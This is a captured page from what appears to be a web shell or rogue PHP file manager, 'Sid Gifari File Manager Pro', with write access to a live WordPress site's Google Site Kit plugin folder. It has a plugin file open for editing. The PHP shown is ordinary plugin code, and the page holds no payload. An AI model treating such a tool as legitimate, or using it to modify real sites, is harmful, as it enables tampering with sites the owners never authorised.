🔐 Sid Gifari File Manager Pro
v8.0.5 | 2026-06-19 07:39:06 | PHP 8.1.34
📂
/ (Root)
/
home
/
therahul
/
reenrihair.com
/
wp-content
/
plugins
/
google-site-kit
/
includes
/
Core
/
Golinks
📍 /home/therahul/reenrihair.com/wp-content/plugins/google-site-kit/includes/Core/Golinks
🔄 Refresh
✏️
Editing: Dashboard_Golink_Handler.php
Writable
<?php /** * Class Google\Site_Kit\Core\Golinks\Dashboard_Golink_Handler * * @package Google\Site_Kit\Core\Golinks * @copyright 2026 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Golinks; use Google\Site_Kit\Context; /** * Golink handler for the Site Kit dashboard URL. * * @since 1.174.0 * @access private * @ignore */ class Dashboard_Golink_Handler implements Golink_Handler_Interface { /** * Builds the dashboard destination URL. * * @since 1.174.0 * * @param Context $context Plugin context. * @return string Destination URL. */ public function handle( Context $context ) { $dashboard_url = $context->admin_url( 'dashboard' ); $permalink = (string) $context->input()->filter( INPUT_GET, 'permaLink', FILTER_DEFAULT ); return add_query_arg( array( 'permaLink' => esc_url_raw( wp_unslash( $permalink ) ) ?: false, ), $dashboard_url ); } }
💾 Save Changes
❌ Cancel